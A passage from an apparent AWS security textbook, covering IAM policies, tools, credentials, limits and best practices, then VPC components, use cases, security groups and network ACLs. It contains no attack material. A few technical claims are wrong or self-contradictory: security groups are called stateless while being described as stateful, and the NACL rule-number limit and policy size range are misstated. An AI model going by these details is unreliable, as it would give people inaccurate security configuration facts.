so on.) to match the condition in the policy against values in the request. These condition
values can include the date, time, the IP address of the requester, the ARN of the request
source, the user name, user ID, and the user agent of the requester. A value from the request
is represented by a key.
Whenever a request is made, the policy is evaluated and AWS replaces key with a similar
value from the request. The condition returns a boolean value, either true or false, that
decides if the policy should either allow or deny that request.
Policies can be categorized into 2 broad categories as follows:
Managed policies: These are standalone policies that can be attached to IAM
1.
identities in your AWS account such as users, groups, and roles. These policies
cannot be applied to AWS resources such as EC2 or S3. When you browse
through policies on IAM dashboard, you can identify AWS managed policies by
the yellow AWS symbol before them. AWS recommends that you use managed
policies over inline policies. There are two types of managed policies available:
AWS managed policies: As the name suggests, these policies are
created as well as managed by AWS. To begin with, it is recommended
you use AWS managed policies as it will cover almost all of your use
cases. You can use these policies to assign permissions to AWS
identities for common job functions such as Administrators,
SecurityAudit, Billing, SupportUser, and so on, as shown in the
following figure. AWS managed policies cannot be changed.
AWS Identity and Access Management
[ 63 ]
customer managed policies: These are the policies created and
managed by you in your AWS account. You would normally create a
policy when you have a use case that's not supported by an AWS
managed policy. You can copy an existing policy, either an AWS
managed policy or a customer managed policy and edit it, or you can
start from scratch as well to create a policy:
Figure 9 - AWS job functions policies
Inline policies: These are policies created and managed by you, and these
2.
policies are embedded directly into a principal entity such as a single user, group,
or role. The policy is part of that entity either when you create an entity or you
can embed the policy later as well. These policies are not reusable. Moreover, if
you delete the principal entity, the inline policy gets deleted as well. You would
normally create inline policies when you need to maintain a one to one
relationship between a policy and a principal entity, that is, you want to make
sure your principal entity is used for a specific purpose only.
Creating a new policy
AWS gives you multiple options to create a new policy in IAM. You can copy an existing
AWS managed policy and customize it according to your requirements. You can use the
policy generator or you can write JSON code to create a policy from scratch or use the
policy editor to create a new policy.
AWS Identity and Access Management
[ 64 ]
Here are the following common steps to be followed before we choose one of the options
for creating a policy:
Sign in to the AWS Management Console using your sign in URL.
1.
Navigate to the IAM dashboard.
2.
Click on Policies on the left navigation bar.
3.
Click on the Create Policy button.
4.
Click on any of the three options to create a new policy as shown in the following
5.
figure:
Copy an AWS Managed Policy
Policy Generator
Create Your Own Policy
Figure 10 - AWS Create Policy options
IAM Policy Simulator
AWS provides you with a Policy Simulator tool that is accessible at https://policysim.
aws.amazon.com. IAM Policy Simulator helps you to test as well as troubleshoot policies,
both identity and resource based. This tool is quite helpful in testing the scope of existing
policies and the scope of newly created policies. You can find out if a policy is allowing or
denying the requested actions for a particular service for a selected IAM identity (user,
group, or role). Since it is a simulator, it does not make an actual AWS request. This tool is
accessible to all users who can access the AWS Management Console.
AWS Identity and Access Management
[ 65 ]
You can also simulate IAM policies using the AWS CLI, API requests or through tools for
Windows PowerShell. You can find more information on testing policies by using the policy
simulator at http://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_
testing-policies.html. As shown in the following figure, the IAM policy simulator shows
for an IAM administrator group how many permissions are allowed or denied for Amazon
SQS and AWS IAM services:
Figure 11 - AWS IAM Policy Simulator
IAM Policy Validator
This is another tool available to fix your non compliant policies in IAM. You will know that
you have a non-compliant policy if you see a yellow banner titled Fix policy syntax at the
top of the console screen. You can use IAM policy validator only if your policy is not
complying with the IAM policy grammar. For example, the size of policy can range
between 2048 characters and 10,240 characters excluding the white space characters, or
individual elements such as Statement cannot have multiple instances of the same key
such as Effect element. Note that a policy cannot be saved if it fails validation. Policy
Validator only checks the JSON syntax and policy grammar, it does not check variables
such as ARN or condition keys. You can access policy validator in three ways: while
creating policies, while editing policies, and while viewing policies.
AWS Identity and Access Management
[ 66 ]
Access Advisor
IAM console gives you information on policies that were accessed by a user. This
information is very useful to implement the least privilege principle for assigning
permissions to your resources. Through access advisor, you can find out what permissions
are used infrequently or permissions that are never used, you can then revoke these
permissions to improve the security of your AWS account. The following figure shows a
few policies in the access advisor that were last accessed 144 days back; there is no reason
these policies should be attached to this user:
Figure 12 - AWS IAM Access Advisor
Passwords Policy
You can set up the password policy for your AWS account from IAM. Navigate to the IAM
dashboard from the AWS console. Click on Account settings. As shown in the following
figure, on the Password Policy page, you can setup requirements such as minimum
password length, rotation period, and so on. Most of these changes in your password policy
are effective when your users log in the next time, however, for changes such as change in
the password expiration period, they are applied immediately:
AWS Identity and Access Management
[ 67 ]
Figure 13 - AWS IAM Password Policy
AWS credentials
As we have seen in the previous chapter, AWS provides you with various credentials to
authorize and authenticate your requests. Let us look at these AWS credentials in detail:
Email and password: These credentials are used by your account root user. As
discussed earlier, by default, the account root user has access to all services and
resources. AWS recommends that root user credentials should be used to create
another user and all the work should be carried out by the other user.
AWS Identity and Access Management
[ 68 ]
IAM username and password: When you create one or more users in your AWS
account through IAM. They can login to the AWS console by using the username
and password. This username is given by you when you create a user in IAM.
Passwords for these users are created by you as well, you can give permissions to
users to change their passwords.
Multi-factor Authentication (MFA): MFA adds an additional layer of security for
your AWS account. When you login to the AWS console by using your username
and password or by using your email address and password for your root user,
you can opt for MFA as an additional level of authentication. You can setup MFA
on the hardware device or you can have a virtual token as well. AWS
recommends to setup MFA for your account root user and IAM users with higher
permissions, to secure your account and resources. You can configure MFA from
the IAM console.
Access keys (access key ID and secret access key): Access keys are used to sign
requests sent to AWS programmatically through AWS SDKs or API. AWS SDKs
use these access keys to sign requests on your behalf so you don't have to do it
yourself. Alternatively, you can sign these requests manually. These keys are
used through CLIs. You can either issue commands signed using your access
keys or you can store these keys as a configuration setting on your resource
sending requests to AWS. You can opt for access keys for users when you are
creating them or later through the IAM console.
Key pairs: Key pairs constitutes a public key and a private key. The private key is
used to create a digital signature and AWS uses the corresponding public key to
validate this digital signature. These key pairs are used only for Amazon EC2 and
Amazon CloudFront. They are used to access Amazon EC2 instances, for
example, to remotely logging into a Linux instance. For CloudFront, you will use
key pairs to create signed URLs for private content, that is when you want to
distribute content that can be viewed only by selected people and not by
everybody. For EC2, you can create key pairs using the AWS console, CLI, or
API. For CloudFront, key pairs can be created only by using the account root user
and through the Security Credentials Page accessible through the AWS console.
AWS account identifiers: AWS provides two unique IDs for each account that
serves as an account identifier: AWS account ID and a canonical user ID. AWS
account ID is a 12 digit number, such as 9028-1054-8394 that is used for
building ARN. So when you refer to AWS resources in your account such as the
S3 bucket, this account ID helps to distinguish your AWS resources from the
AWS resources of other accounts. The canonical user ID is a long string such as
28783b48a1be76c5f653317e158f0daac1e92667f0e47e8b8a904e03225b81b
5. You would normally use the canonical user ID if you want to access AWS
resources in AWS accounts other than your AWS account.
AWS Identity and Access Management
[ 69 ]
X.509 Certificates: A X.509 certificate is a security device designed to carry a
public key and bind that key to an identity. X.509 certificates are used in public
key cryptography. You can either use the certificate generated by AWS or upload
your own certificate to associate it with your AWS account.
You can view all these security credentials except for EC2 key pairs in the AWS console as
shown in the following figure. The EC2 key pairs can be found on the EC2 dashboard:
Figure 14 - AWS Security Credentials
IAM limitations
IAM has certain limitations for entities and objects. Let us look at the most important
limitations across the most common entities and objects:
Names of all IAM identities and IAM resources can be alphanumeric. They can
include common characters such as plus (+), equal (=), comma (,), period (.), at
(@), underscore (_), and hyphen (-).
Names of IAM identities (users, roles, and groups) must be unique within the
AWS account. So you can't have two groups named DEVELOPERS and
developers in your AWS account.
AWS account ID aliases must be unique across AWS products in your account. It
cannot be a 12 digit number.
AWS Identity and Access Management
[ 70 ]
You can create 100 groups in an AWS account.
You can create 5000 users in an AWS account. AWS recommends the use of
temporary security credentials for adding a large number of users in an AWS
account.
You can create 500 roles in an AWS account.
An IAM user can be a member of up to 10 groups.
An IAM user can be assigned a maximum of 2 access keys.
An AWS account can have a maximum of 1000 customer managed policies.
You can attach a maximum of 10 managed policies to each IAM entity (user,
groups, or roles).
You can store a maximum of 20 server certificates in an AWS account.
You can have up to 100 SAML providers in an AWS account.
A policy name should not exceed 128 characters.
An alias for an AWS account ID should be between 3 and 63 characters.
A username and role name should not exceed 64 characters.
A group name should not exceed 128 characters.
For more information on AWS IAM limitations, please visit http://docs.aws.amazon.com/
IAM/latest/UserGuide/reference_iam-limits.html.
To increase limits for some of these resources, you can contact AWS support through the
AWS console.
IAM best practices
Lock root account keys: As we know the root account user has access to all resources for all
AWS services by default, so if you have access keys (access key ID and secret access key) for
a root account user, lock them in a secure place and rotate them periodically.
Do not share credentials: AWS gives you multiple ways for your users to interact with
resources in your AWS account, so you would never have a requirement to share
credentials. Create individual users for all access requirements with necessary credentials
and never share credentials with other users.
AWS Identity and Access Management
[ 71 ]
Use managed policies: AWS provides comprehensive sets of policies that cover access
requirements for the most common scenarios. AWS also provides you policies aligned with
job functions. These policies are managed by AWS and they are updated as and when
required so you don't have to worry about your policies getting outdated when new
services or functionalities are introduced.
Use groups to manage users: Groups are an excellent way to manage permissions for your
users and individual IAM users as well. Always add users to groups and assign policies
directly to groups instead of assigning permissions to individual IAM users. Whenever
there is a movement required for an individual user, you can simply move them to the
appropriate group.
Follow the least privilege principle: Whenever you grant permissions, follow the standard
security advice of Least Privilege, that is, if a user does not need to interact with a resource,
do not grant access to that resource. Another example of least privilege is that if a user
needs read-only access for one S3 bucket, access should be given only for that one S3 bucket
and that access should be read-only. Use the IAM Access Advisor feature periodically to
verify if all permissions assigned to a user are used frequently. If you find that a permission
is used rarely or not used at all, revoke it after confirming it is not required to carry on
regular tasks by your IAM user.
Review IAM permissions: Use the IAM summary feature in IAM console to review
permissions assigned for each IAM user. Check their access levels for all resources they are
allowed to interact with. Access level for a policy is categorized as list, read, write, and
permissions management. Review these periodically for all policies. The following image
shows how policies are summarized in three categories:
Figure 15 - AWS IAM policy summaries
AWS Identity and Access Management
[ 72 ]
Enforce strong passwords: Configure your account password policy from Account settings
in your IAM console to enforce strong passwords for all your users, including periodic
password rotation, avoiding reuse of old passwords, minimum length, using alphanumeric
characters, and so on.
Enable MFA: Enable MFA for all IAM users who access AWS resources through the AWS
Management Console. This will provide an additional layer of security for your AWS
resources.
Use roles for applications: For all the applications that run on Amazon EC2 instances, use
roles for providing access to other AWS services. Roles are managed by AWS and they do
not need to store security credentials on EC2 instances. So, even if your EC2 instance is
compromised, your credentials are secure. You can either assign roles to an EC2 instance
when you are launching it or you can also assign roles on the fly, that is, when you need to
access a resource you can assign it.
Use roles for delegation: Whenever you have a requirement for delegation, that is, you
need to allow cross account access, use roles instead of sharing credentials. In general, AWS
recommends using roles instead of using individual IAM users as roles are managed by
AWS and credentials are rotated several times in a day.
Rotate credentials: Ensure that all credentials in your AWS account are rotated periodically.
These credentials include passwords, access keys, key pairs, and so on. This will ensure that
you will limit the abuse of your compromised credentials. If you find that credentials are
not required for a user, remove them. You can find if credentials are used or not by
downloading the credentials report from the AWS console for your AWS account.
Use policy condition: For all policies that allow access, use policy condition element as
much as possible. For example: if you know all the IP addresses that should be accessing
your AWS resource, add them to the policy condition. Similarly, if you know that you want
to allow access only for a limited duration, like for four hours, add that duration to the
policy condition. For high privilege actions, such as deleting an S3 bucket or provisioning
an EC2 or and RDS instance, enforce Multi-Factor Authentication (MFA) by adding it to
the policy condition.
Monitor account activity: IAM integrated with AWS CloudTrail that records all API
activity for your AWS account. Use AWS CloudTrail to monitor all activities in your
account. How many requests where made, how many were allowed and how many were
denied. Monitor what actions were performed on your AWS resources and by whom. You
can identify suspicious activity from CloudTrail logs and take the necessary actions based
on your analysis.
AWS Identity and Access Management
[ 73 ]
Summary
This concludes Chapter 2, AWS Identity and Access Management. IAM is one of the most
important AWS service as it controls access to your AWS resources. We had a detailed view
of Identities including users, groups, and roles. We learnt how to create each of these
identities and what features each of these identities offer to support multiple use cases.
We looked at identity federation to allow access for identities that are managed out of our
AWS account. We learnt about delegation, temporary security credentials, AWS Security
token service and account root user.
We also learnt about policies and permissions. We went through various elements of a
policy. We got to know that AWS managed policies are preferred over inline policies for
most use cases. There are multiple tools and features available to help us write, validate,
and manage our own policies such as IAM policy validator, access advisor, credentials
report, and so on.
Apart from these, we looked at various AWS credentials to support numerous scenarios.
We ran through IAM limitations for various entities and objects. Lastly, we went through
IAM best practices to secure our AWS resources.
In the next chapter, AWS Virtual Private Cloud, we are going to learn how we can secure our
network in AWS. VPC, as it is popularly called, closely, resembles your on-premises
network and has all the components similar to your on-premises network. So, you will find
route tables, subnets, gateways, virtual private connections, and so on available at your
fingertips in AWS as well to design your own virtual private network in AWS. We will
learn how to create a VPC including various components of a VPC, how to configure it to
secure our resources in our VPC, how to connect our network in cloud to our data center
securely, and what security features are available for our VPC.
3
AWS Virtual Private Cloud
Amazon Virtual Private Cloud or VPC, as it is popularly known, is a logically separated,
isolated, and secure virtual network on the cloud, where you provision your infrastructure,
such as Amazon RDS instances and Amazon EC2 instances. It is a core component of
networking services on AWS cloud.
A VPC is dedicated to your AWS account. You can have one or more VPCs in your AWS
account to logically isolate your resources from each other. By default, any resource
provisioned in a VPC is not accessible by the internet unless you allow it through AWS-
provided firewalls. A VPC spans an AWS region.
VPC is essentially your secure private cloud within AWS public cloud. It is specifically
designed for users who require an extra layer of security to protect their resources on the
cloud. It segregates your resources with other resources within your AWS account. You can
define your network topology as per your requirements, such as if you want some of your
resources hidden from public or if you want resources to be accessible from the internet.
Getting the design of your VPC right is absolutely critical for having a secure, fault-tolerant,
and scalable architecture.
It resembles a traditional network in a physical data center in many ways, for example,
having similar components such as subnets, routes, and firewalls; however, it is a software-
defined network that performs the job of data centers, switches, and routers. It is primarily
used to transport huge volume of packets into, out of, and across AWS regions in an
optimized and secured way along with segregating your resources as per their access and
connectivity requirements. And because of these features, VPC does not need most of the
traditional networking and data center gear.
VPC gives you granular control to define what traffic flows in or out of your VPC.
AWS Virtual Private Cloud
[ 75 ]
Chapter overview
In this chapter, we will deep dive into the security of AWS VPC. VPC is the most important
component of networking services in AWS. Networking services are one of the foundation
services on the AWS cloud. A secure network is imperative to ensure security in AWS for
your resources.
We will look at components that make up VPC, such as subnets, security groups, various
gateways, and so on. We will take a deep dive into the AWS VPC features and benefits such
as simplicity, security, multiple connectivity options, and so on.
We will look at the following most popular use cases of VPC that use various security and
connectivity features of VPC:
Hosting a public-facing website
Hosting multi-tier web applications
Creating branch office and business unit networks
Hosting web applications in AWS cloud that are connected with your data center
Extending corporate network on the cloud
Disaster recovery
AWS provides multiple measures to secure resources in VPC and monitor activities in VPC,
such as security groups, network access control list (ACL), and VPC flow logs. We will dive
deep into each of these measures.
Next, we'll walk through the process of creating a VPC. You can either choose to create a
VPC through the wizard, through the console, or through the CLI.
Furthermore, we'll go through the following VPC connectivity options along with VPC
limits in detail:
Network to AWS VPC
AWS VPC to AWS VPC
Internal user to AWS VPC
We'll wrap up this chapter with VPC best practices.
Throughout this chapter, we'll take a look at AWS architecture diagrams for various use
cases, connectivity options, and features. The objective of this chapter is to familiarize you
with AWS VPC and let you know about ways to secure your VPC.
AWS Virtual Private Cloud
[ 76 ]
VPC components
AWS VPC is a logically separated network isolated from other networks. It lets you set your
own IP address range and configure security settings and routing for all your traffic. AWS
VPC is made up of several networking components, as shown in the following figure; some
of them are as follows:
Subnets
Elastic network interfaces
Route tables
Internet gateways
Elastic IP addresses
VPC endpoints
NAT
VPC peering
Figure 1 - AWS VPC components
AWS Virtual Private Cloud
[ 77 ]
Let's take a closer look at these components:
Subnets
A VPC spans an AWS region. A region contains two or more availability zones. A VPC
contains subnets that are used to logically separate resources inside a region. A subnet
cannot span across multiple availability zones. A subnet can either be a private subnet or a
public subnet based on its accessibility from outside of VPC and if it can access resources
outside of VPC.
Subnets are used for separating resources, such as web servers and database servers. They
are also used for making your application highly available and fault-tolerant. By default, all
resources in all subnets of a VPC can route (communicate) to each other using private IP
addresses.
Elastic Network Interfaces (ENI)
The ENI are available for EC2 instances running inside a VPC. An ENI can have many
attributes, such as a primary private IPv4 address, a MAC address, one or more security
groups, one or more IPv6 addresses, and so on. These attributes will move with ENI when
an ENI is attached to an instance; when this ENI is detached from an instance, these
attributes will be removed.
By default, every VPC has a network interface attached to every instance. This ENI is
known as a primary network interface (eth0). This default ENI cannot be detached from an
instance. You can, however, create and attach many additional ENIs to your instances
inside a VPC.
One of the popular use cases of ENI is having secondary ENI attached to instances running
network and security appliances, such as network address translation servers or load
balancers. These ENIs can be configured with their own attributes, such as public and
private IP address, security groups, and so on.
AWS Virtual Private Cloud
[ 78 ]
Route tables
As you've learned about VPC, it essentially facilitates traffic in and out of a software-
defined network. This traffic needs to know where to go, and this is achieved via route
tables. A route table in VPC has rules or routes defined for the flow of traffic. Every VPC
has a default route table that is known as the main route table. You can modify this main
route table and you can create additional route tables.
Each subnet in VPC is associated with only one route table, however, one route table can be
attached to multiple subnets. You use route tables to decide what data stays inside of VPC
and what data should go outside of VPC, and that is where it plays a very important part in
deciding data flow for a VPC.
In the following figure, you can see four route tables for two VPCs in my AWS account. You
can see rules in the route table, and you see tabs for subnet associations as well:
Figure 2 - AWS VPC route tables
Internet Gateway
An internet gateway allows communication between resources such as EC2 and RDS
instances in your VPC and the Internet. It is highly available, redundant, and horizontally
scalable; that is, you do not need to attach more than one internet gateway to your VPC in
order to support an increase in traffic.
AWS Virtual Private Cloud
[ 79 ]
An internet gateway serves as a target for route table in VPC for all the traffic that is
supposed to go out of VPC to the internet. Along with that, it also performs network
address translation for all instances with public IPv4 addresses.
Elastic IP addresses
An Elastic IP Address is a public IPv4, static address that can be associated with any one
instance or one network interface at a time within any VPC in your AWS account. When
your application is dependent on an IP address, you would use an Elastic IP address
instead of a regular public IP address because public IP addresses would be lost if the
underlying instance shuts down for some reason. You can simply move your Elastic IP
address to another instance that is up and running from a failed instance.
You first allocate an Elastic IP address and then associate it with your instance or network
interface. Once you do not need it, you should disassociate it and then release it. If an
Elastic IP address is allocated but not associated with any instance, then you will be charged
by AWS on an hourly basis, so if you don't have a requirement for Elastic IP addresses, it is
better to release them.
VPC endpoints
A VPC endpoints is a secure way to communicate with other AWS services without using
the internet, Direct Connect, VPN Connection, or a NAT device. This communication
happens within the Amazon network internally so your traffic never goes out of Amazon
network. At present, endpoints are supported only for Simple Storage Service (S3). These
endpoints are virtual devices supporting IPv4-only traffic.
An endpoint uses the private IP address of instances in your VPC to communicate with
other services. You can have more than one endpoint in your VPC. You create a route in
your route table for directing traffic from instance V2 in subnet 2 through your endpoint to
your target service (such as S3), as shown in the following figure:
AWS Virtual Private Cloud
[ 80 ]
Figure 3 - AWS VPC endpoints
Network Address Translation (NAT)
You will often have resources in your VPC that will reside in private subnets that are not
accessible from the internet. However, these resources will need to access the internet
occasionally for patch update, software upgrade, and so on. A NAT device is used exactly
for this purpose, allowing resources in private subnet to connect with either the internet or
other AWS services securely. NAT devices support only IPv4 traffic.
AWS offers a NAT gateway, a managed device, and a NAT instance as NAT devices.
Depending on your use case, you will choose either of them. AWS recommends a NAT
gateway over a NAT instance as it is a managed service that requires little or no
administration, is highly available, and highly scalable.
AWS Virtual Private Cloud
[ 81 ]
VPC peering
You can connect your VPC with one or more VPCs in the same region through the VPCs
peering option. This connection enables you to communicate with other VPC using private
IPv4 or private IPv6 addresses. Since this is a networking connection, instances in these
VPCs can communicate with each other as if they are in the same network.
You can peer with VPCs in your AWS account or VPCs in other AWS accounts as well.
Transitive peering is not allowed and VPCs should not have overlapping or matching IPv4
or IPv6 CIDR blocks. The following figure shows VPC peering between VPC A and VPC B.
Note that the CIDR blocks differ for these two VPCs:
Figure 4 - AWS VPC peering
VPC features and benefits
AWS VPC offers many features and benefits to secure your resources in your own virtual
network on the cloud. You can scale your resources and select resources as per your
requirement in VPC just like you do in AWS, with the same level of reliability and
additional security. Let's look at these features and benefits.
AWS Virtual Private Cloud
[ 82 ]
Multiple connectivity options
Your AWS VPC can be connected to a variety of resources, such as the internet, your on-
premise data center, other VPCs in your AWS account, or VPCs in other AWS accounts;
once connected, you can make your resources accessible or inaccessible in your VPC from
outside of your VPC based on your requirement.
You can allow your instances in your VPC to connect with the internet directly by
launching them in a subnet that is publicly accessible, also known as a public subnet. This
way, your instances can send and receive traffic from the internet directly.
For instances in private subnets that are not publicly accessible, you can use a NAT device
placed in a public subnet to access the internet without exposing their private IP address.
You can connect your VPC to your corporate data center by creating a secure VPN tunnel
using encrypted IPsec hardware VPN connection. Once connected, all traffic between
instances in your VPC and your corporate data center will be secured via this industry
standard hardware VPN connection.
You can connect your VPC with other VPCs privately in the same region through the VPC
peering feature. This way, you can share resources in your VPC with other virtual networks
across your AWS accounts or other AWS accounts.
The VPC endpoint is used to connect to AWS services such as S3 without using internet
gateway or NAT. You can also configure what users or resources are allowed to connect to
these AWS services.
You can mix and match the mentioned options to support your business or application
requirements. For example, you can connect VPC to your corporate data center using a
hardware VPN connection, and you can allow instances in your public subnet to connect
directly with the internet as well. You can configure route tables in your VPC to direct all
traffic to its appropriate destination.
Secure
AWS VPC has security groups that act as an instance-level firewall and network ACLS that
act as a subnet-level firewall. These advanced security features allow you to configure rules
for incoming and outgoing traffic for your instances and subnets in your VPC.
AWS Virtual Private Cloud
[ 83 ]
With help of the VPC endpoint, you can enable access control for your data in AWS S3 so
that only instances in your VPC can access that data. You can also launch dedicated
instances to have isolation at the instance level; these instances have dedicated hardware for
a single customer.
Simple
AWS VPC can be created using AWS Management Console in a couple of ways; you can
either create it through Start VPC Wizard, or you can create it manually as well. You can
also create VPC from AWS command-line interface.
VPC wizard gives you multiple options to create VPC, as shown in the following figure;
you can pick one that suits your requirements and customize it later if needed. When you
create a VPC using VPC wizard, all components of VPC, such as security groups, route
tables, subnets and so on, are automatically created by VPC wizard:
Figure 5 - AWS VPC wizard
VPC use cases
With VPC, you can control inbound and outbound access for your resources in your own
virtual private network and connect your data center with AWS cloud securely along with
other VPCs in your AWS accounts and VPCs in other AWS accounts. You can also securely
access data on S3 from your resources in VPC without using the internet.
AWS Virtual Private Cloud
[ 84 ]
All these along with many other features make VPC a preferred choice for a variety of use
cases, such as hosting development and testing environments in AWS VPC. You could also
use VPC for creating environments for Proof of Concept (PoC). These environments can be
created on short notice and could act as an isolated network accessible only by specific
teams or other resources. Since VPC is a software-defined network, it brings loads of
flexibility in designing, integrating, and securing your resources in AWS cloud.
Let's look at some of the most popular use cases for VPC.
Hosting a public facing website
You can host a public facing website, which could be a blog, a single tier simple web
application, or just a simple website using VPC. You can create a public subnet using the
VPC wizard and select the VPC with a single public subnet only option, or you can create
it manually. Secure your website using instance-level firewalls, known as security groups,
allowing inbound traffic, either HTTP or HTTPS, from the internet and restricting outbound
traffic to the internet when required at the same time.
Hosting multi-tier web application
Hosting a multi-tier web application requires stricter access control and more restrictions
for communication between your servers for layers, such as web servers, app servers, and
database servers. VPC is an ideal solution for such web applications as it has all
functionalities built in.
In the following figure, there is one public subnet that contains the web server and the
application server. These two instances need to have inbound and outbound access for
internet traffic. This public subnet also has one NAT instance that is used to route traffic for
database instance in the private subnet.
AWS Virtual Private Cloud
[ 85 ]
The private subnet holds instances that do not need to have access to the internet. They only
need to communicate with instances in the public subnet. When an instance in the private
subnet needs to access the internet for downloading patches or software update, it will do
that via a NAT instance placed in the public subnet:
Figure 6 - AWS VPC for a multi-tier web application
Access control for this sort of architecture is configured using network ACLs that act as a
firewall for subnets. You will also use security groups for configuring access at the instance
level, allowing inbound and outbound access.
The VPC wizard gives you an option, VPC with Public and Private Subnets, to support
this use case; alternatively, you can create a VPC using AWS console manually or through a
command-line interface.
AWS Virtual Private Cloud
[ 86 ]
Creating branch office and business unit
networks
Quite often, there is a requirement for connecting branch offices with their own,
interconnected networks. This requirement can be fulfilled by provisioning instances within
a VPC with a separate subnet for different branch offices. All resources within a VPC can
communicate with each other through a private IP address by default, so all offices will be
connected to each other and will also have their own local network within their own subnet.
If you need to limit communication across subnets for some instances, you can use security
groups to configure access for such instances. These rules and designs can be applied to
applications that are used by multiple offices within an organization. These common
applications can be deployed within a VPC in a public subnet and can be configured so that
they are accessible only from branch offices within an organization by configuring NACLs
that acts as a firewall for subnets.
The following figure shows an example of using VPC for connecting multiple branch offices
with their own local networks:
Figure 7 - AWS VPC for connecting branch offices
AWS Virtual Private Cloud
[ 87 ]
Hosting web applications in the AWS Cloud that
are connected with your data center
Through VPC, you can also support scenarios where instances in one subnet allow inbound
and outbound access to the internet and instances in other subnet can communicate
exclusively with resources in your corporate data center. You will secure these
communications by creating an IPsec hardware VPN connection between your VPC and
your corporate network.
In this scenario, you can host your web applications in the AWS cloud in VPC and you can
sync data with databases in your corporate data center through the VPN tunnel securely.
You can create a VPC for this use case using the VPC wizard and selecting VPC with Public
and Private Subnets and Hardware VPN Access. You can also create a VPC manually
through the AWS console or through the CLI.
Extending corporate network in AWS Cloud
This use case is specifically useful if you have a consistent requirement for provisioning
additional resources, such as compute, storage, or database capacity to your existing
infrastructure based on your workload.
This use case is also applicable to all those data centers that have reached their peak
capacity and don't have room to extend further.
You can extend your corporate networking resources in the AWS cloud and take all benefits
of cloud computing such as elasticity, pay-as-you-go model, security, high availability,
minimal or no capex, and instant provisioning of resources by connecting your VPC with
your corporate network.
You can host your VPC behind the firewall of your corporate network and ensure you
move your resources to the cloud without impacting user experience or the performance of
your applications. You can keep your corporate network as is and scale your resources up
or down in the AWS cloud based on your requirements.
You can define your own IP address range while creating an AWS VPC, so extending your
network into a VPC is similar to extending your existing corporate network in your physical
data center.
AWS Virtual Private Cloud
[ 88 ]
To support this use case, you can create a VPC by opting for the VPC with a Private Subnet
Only and Hardware VPN Access option in the VPC wizard or create a VPC manually. You
can either connect your VPC to your data center using hardware VPN or through AWS
direct connect service. The following figure shows an example of a data center extended in
AWS cloud through VPC using an existing internet connection. It uses a hardware VPN
connection for connecting the data center with AWS VPC:
Figure 8 - AWS VPC extend corporate data center
Disaster recovery
As part of your disaster recovery (DR) and business continuity plan, you will need to
continuously back up your critical data to your DR site. You can use a VPC to host EC2
instances with EBS volumes and store data in S3 buckets as well as in EBS volumes attached
to EC2 instances securely, which can be configured to be accessible only from your network.
As part of your business continuity plan, you might want to run a small set of EC2 instances
in your VPC, and these EC2 instances could be scaled quickly to meet the demand of a
production workload in the event of a disaster. When the disaster is over, you could
replicate data back to your data center and use servers in the data center to run your
workload. Post that, you can terminate additionally provisioned resources, such as EC2
instances and RDS instances in AWS VPC.
AWS Virtual Private Cloud
[ 89 ]
You can plan your disaster recovery and business continuity with AWS VPC at a fraction of
the cost of a traditional co-location site using physical data center. Moreover, you can
automate your disaster recovery and business continuity plan using the AWS
CloudFormation service; this automation will drastically reduce your deployment and
provisioning time in AWS VPC when compared with a traditional physical data center.
VPC security
AWS VPC essentially carries out the task of moving IP traffic (packets) into, out of, and
across AWS regions; so, the first line of defense for a VPC is to secure what traffic can enter
and leave your VPC. All resources can communicate with each other within a VPC unless
explicitly configured not to do that, so this leaves us primarily with securing
communication outside of your VPC with resources inside your VPC and vice versa.
AWS VPC provides multiple features for securing your VPC and securing resources inside
your VPC, such as security groups, network ACL, VPC Flow Logs, and controlling access
for VPC. These features act as additional layers of defense while designing your VPC
architecture and are used to increase security and monitor your VPC. Apart from these
features, you have a routing layer available in the form of route tables.
These features enable us to implement a layered defense for an in-depth security
architecture for AWS VPC that involves all layers in a network. These security features also
align security controls with the application requirement of scalability, availability, and
performance.
Let's look at these security features in detail.
Security groups
A security group is a virtual firewall to control ingress and egress traffic at the instance
level for all instances in your VPC. Each VPC has its own default security group. When you
launch an instance without assigning a security group, AWS will assign a default security
group of VPC with this instance. Each instance can be assigned up to five security groups.
For a security group, in order to control ingress and egress traffic, we need to define rules
for a security group. These rules need to be defined separately for controlling ingress and
egress traffic. These rules are only permissive; that is, there can only be allow rules and
there can't be deny rules.
AWS Virtual Private Cloud
[ 90 ]
When you create a new security group, by default, it does not allow any inbound traffic.
You have to create a rule that allows inbound traffic. By default, a security group has a rule
that allows all outbound traffic. Security groups are stateless, so if you create a rule for
inbound traffic that allows traffic to flow in, this rule will allow outbound traffic as well;
there is no need to create a separate rule to allow outbound traffic. These rules are editable
and are applied immediately. You can add, modify, or delete a security group, and these
changes are effective immediately as well. You can perform these actions from the AWS
console or through the command line or an API.
An ENI can be associated with up to five security groups, while a security group can be
associated with multiple instances. However, these instances cannot communicate with
each other unless you configure rules in your security group to allow this. There is one
exception to this behavior: the default security group already has these rules configured.
The following figure shows the security groups set up in my AWS account. This security
group is created for the web server, so it has rules configured in order to allow HTTP and
HTTPS traffic. It also allows SSH access on port 22 for logging into this instance:
Figure 9 - AWS VPC security groups
AWS Virtual Private Cloud
[ 91 ]
Network access control list
The network access control list (NACL), as it is popularly known, is another virtual
firewall provided by AWS VPC to configure inbound and outbound traffic for your subnets
inside a VPC. So, all instances within this subnet are going to use the same configuration for
inbound and outbound traffic. NACLs are used for creating guardrails in an organization
for your network on the cloud as it does not offer granular control. Moreover, NACLs are
usually configured by system administrators in an organization.
Every VPC has a default NACL that allows all inbound and outbound traffic by default.
When you create a custom NACL, it denies all inbound and outbound traffic by default.
Any subnet that is not explicitly associated with an NACL is associated with a default
NACL and allows all traffic, so make sure all subnets in your VPCs are explicitly associated
with an NACL.
NACL uses rules similar to security groups to configure inbound and outbound traffic for a
subnet. Unlike security groups, NACL gives you the option to create allow and deny rules.
NACL is stateless and you will need to create separate rules for inbound and outbound
traffic.
Each subnet in your VPC can be attached to only one NACL. However, one NACL can be
attached to more than one subnet. Rules in NACL are evaluated from the lower to the
higher number, and the highest number you can have is 32776. AWS recommends that you
create rules in multiples of 100, such as 100, 200, 300, and so on, so you have room to add
more rules when required.
The following figure shows network ACL for a public subnet. It allows inbound and
outbound HTTP and HTTPS traffic. This NACL can be used for all public subnets that will
contain all instances that need to access the internet and those that are publicly accessible:
AWS Virtual Private Cloud
[ 92 ]
Figure 10 - AWS VPC NACL
VPC flow logs
VPC facilitates the flow of inbound and outbound traffic for all resources in your VPC. It is
important to monitor the flow of this IP traffic on a continuous basis in order to ensure that
all traffic is going to the desired recipient and is received from expected resources. This
feature is also useful for troubleshooting issues related to traffic not reaching its destination
